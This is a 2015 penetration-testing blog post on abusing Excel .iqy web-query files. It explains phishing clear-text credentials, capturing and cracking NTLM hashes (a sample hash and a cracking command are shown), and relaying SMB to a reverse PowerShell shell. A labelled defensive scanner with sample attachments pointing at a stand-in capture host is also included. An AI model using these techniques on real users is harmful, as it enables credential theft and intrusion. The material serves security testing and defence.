Wednesday, August 26, 2015

Abusing Web Query (.iqy) files for effective phishing

A few days back I saw tweets from the awesome Casey Smith about IQY files.
Like any penetration tester or red teamer worth his salt, I always try to use the built-in functionality of the target for my job, so this was obviously very interesting. The ability to make a web request using native/trusted tools is something no attacker would like to miss.

Casey soon tweeted a simple PoC.

I shared the grin! It is indeed easy yet effective phishing, and much more: IQY files could be used for SMB relay attacks as well. Let's have a look at a few possibilities.

Phishing for clear text credentials

I have created a PowerShell script which can generate an IQY file. I give you Out-WebQuery.ps1, which can be found in the Client directory of Nishang. Below is an example of using it:


For the listener, let's use Start-CaptureServer.ps1. This script starts an HTTP listener and is capable of logging Basic and NTLM authentication requests made to it. It must be run from an elevated shell on the attacker's machine. For clear text credentials we must choose AuthType Basic; it can be used this way:

Now, the IQY file generated in the first step could be sent to a victim as an email attachment, or a user could be tricked into opening it from a URL, or it could be dropped on the target's machine using a Human Interface Device. Either way, the file is opened in MS Excel and the user gets a security warning.
So, after clicking on Enable, our target will see a prompt asking for credentials:
After the target user enters his credentials (they almost always do), we can see this on the listener and in the log file:
Woohoo! User credentials in clear text.

Phishing for NTLM Hashes

Out-WebQuery and Start-CaptureServer can also be used to capture NTLMv2 hashes in the netntlm format from a target. There is less chance of getting caught while using hashes as compared to Basic authentication, and the credential prompt the user gets is less suspicious as well. We just need to use AuthType NTLM2.

The hashes could then be cracked using John the Ripper. The hashes captured above should be put in hashes.txt in the format below:
nikhil::PFPTLAB:00000000000000000000000000000000060380250000000F:970170524E4B2A0D00000000020000000000000000000000:1122334455667788
and
john --format=netntlm hashes.txt

We can also use Inveigh (https://github.com/Kevin-Robertson/Inveigh) for capturing hashes using PowerShell. It is much more versatile than Start-CaptureServer and has many more capabilities.

SMB Relay

We can use IQY files for SMB relaying as well, because IQY files also support UNC paths. In such a case, the user need not enter his credentials.
Unfortunately, there is no PowerShell code which is able to relay hashes. Let's use smbrelayx from the Impacket library. Let's relay SMB authentication from 192.168.230.111, a Windows 7 machine, to 192.168.230.112, a Windows 8 machine in my lab.
The runps.exe above is a .Net Console application which runs an encoded PowerShell script on the target by calling powershell.exe. The encoded PowerShell script is the Invoke-PowerShellTcpOneLine from Nishang.

There are of course much better and stealthier methods of calling PowerShell code from .Net, but let's not discuss that here.
Now, as soon as the target opens the IQY file sent to it:
Yay! An interactive PowerShell session. If you want, this can easily be upgraded to a meterpreter session as well; msfvenom's PowerShell payloads will be your friends.
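As an added example (not from the post and not part of Nishang), here is a small Python scanner a mail gateway or incident responder could run over .iqy attachments. It parses the Web Query format (keyword WEB, version line, then the query target) and flags the two kinds of data source the post relies on: an untrusted HTTP URL, which can lead to a Basic credential prompt, and a UNC path, which makes Excel authenticate over SMB without any prompt. The trusted host list and the sample files are constructed for the example.

```python
from urllib.parse import urlparse

# Hosts this organisation accepts as Excel web query sources.
# Constructed allowlist for the example; tune it to your environment.
TRUSTED_HOSTS = {"intranet.example.corp", "reports.example.corp"}

def analyze_iqy(text: str) -> dict:
    """Parse an Excel Web Query (.iqy) file and flag risky query targets.

    The format is plain text: line 1 is the keyword WEB, line 2 the version
    (1), line 3 the query target, then optional key=value options. The
    target is what Excel will connect to after the security warning, so it
    is the field a mail gateway or EDR rule should inspect.
    """
    lines = [line.strip() for line in text.splitlines()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        return {"is_web_query": False, "target": None,
                "suspicious": False, "reasons": ["not an IQY web query"]}
    target = lines[2]
    reasons = []
    if target.startswith("\\\\") or target.lower().startswith("file:"):
        # A UNC or file: target makes Excel authenticate to the share over
        # SMB with no credential prompt: the relay case described above.
        reasons.append("UNC/file target: triggers outbound SMB authentication")
    else:
        parsed = urlparse(target)
        host = (parsed.hostname or "").lower()
        if parsed.scheme in ("http", "https"):
            if host not in TRUSTED_HOSTS:
                reasons.append(f"web target on untrusted host {host!r}")
            if parsed.scheme == "http":
                # A 401 with WWW-Authenticate: Basic over a plain-text
                # connection hands the listener the password as typed.
                reasons.append("plain HTTP: a Basic-auth prompt sends credentials in clear text")
        else:
            reasons.append(f"unexpected target scheme {parsed.scheme!r}")
    return {"is_web_query": True, "target": target,
            "suspicious": bool(reasons), "reasons": reasons}

# Constructed sample attachments (not captures from the post's lab).
SAMPLE_PHISH = "WEB\n1\nhttp://capture.example.net/\n\nSelection=AllTables\nFormatting=None\n"
SAMPLE_UNC = "WEB\n1\n\\\\capture.example.net\\share\\report.html\n"
SAMPLE_OK = "WEB\n1\nhttps://reports.example.corp/sales.htm\n\nSelection=AllTables\n"

if __name__ == "__main__":
    for name, sample in (("phish", SAMPLE_PHISH), ("unc", SAMPLE_UNC), ("ok", SAMPLE_OK)):
        print(name, analyze_iqy(sample))
```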

Please note that there are tons of existing ways to perform the above attacks. See this nice blog post by Karl: https://blog.netspi.com/10-places-to-stick-your-unc-path/. In fact, the methods listed there could be used with Start-CaptureServer or Inveigh as well.

Out-WebQuery and Start-CaptureServer could be found in the Nishang repository: https://github.com/samratashok/nishang

I had never heard of abusing IQY files before, and this is one more trick added to my, and hopefully your, collection of phishing tricks. I hope this is useful to some of you.

If you liked the post and want to learn more and/or want to support my research and work, join me for a two-day training, "PowerShell for Penetration Testers", at:

DeepSec, Vienna (November 17-18th, 2015) - https://deepsec.net/speaker.html#WSLOT192


4 comments:

  1. Excellent post. Have you explored the possibility of using Powershell to relay NTLM credentials?

    Replies
    1. Not yet. I believe Kevin Robertson, the creator of Inveigh, is working on it.

  2. + FullyQualifiedErrorId : DotNetMethodException

    You cannot call a method on a null-valued expression.
    At F:\HACK\nishang\Utility\Start-CaptureServer.ps1:159 char:32
    $response.AddHeader <<<< ('WWW-Authenticate', 'Basic')
    + CategoryInfo : InvalidOperation: (AddHeader:String) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

    You cannot call a method on a null-valued expression.
    At F:\HACK\nishang\Utility\Start-CaptureServer.ps1:160 char:26
    $response.AddHeader <<<< ("Content-Type","text/html")
    + CategoryInfo : InvalidOperation: (AddHeader:String) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

    You cannot call a method on a null-valued expression.
    At F:\HACK\nishang\Utility\Start-CaptureServer.ps1:161 char:32
    $response.AddHeader <<<< ("Host","InternetGateway")
    + CategoryInfo : InvalidOperation: (AddHeader:String) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

    Property 'StatusCode' cannot be found on this object; make sure it exists and is settable.
    At F:\HACK\nishang\Utility\Start-CaptureServer.ps1:162 char:17
    $response. <<<< StatusCode = 401
    + CategoryInfo : InvalidOperation: (StatusCode:String) [], RuntimeException
    + FullyQualifiedErrorId : PropertyNotFound

    Property 'ContentLength64' cannot be found on this object; make sure it exists and is settable.
    At F:\HACK\nishang\Utility\Start-CaptureServer.ps1:166 char:17
    $response. <<<< ContentLength64 = $buffer.length
    + CategoryInfo : InvalidOperation: (ContentLength64:String) [], RuntimeException
    + FullyQualifiedErrorId : PropertyNotFound

    You cannot call a method on a null-valued expression.
    At F:\HACK\nishang\Utility\Start-CaptureServer.ps1:168 char:20
    $output.Write <<<< ($buffer, 0, $buffer.length)
    + CategoryInfo : InvalidOperation: (Write:String) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

    You cannot call a method on a null-valued expression.
    At F:\HACK\nishang\Utility\Start-CaptureServer.ps1:169 char:20
    $output.Close <<<< ()
    + CategoryInfo : InvalidOperation: (Close:String) [], RuntimeException
    Replies
    1. From the above post: "It (Start-CaptureServer) must be run from an elevated shell"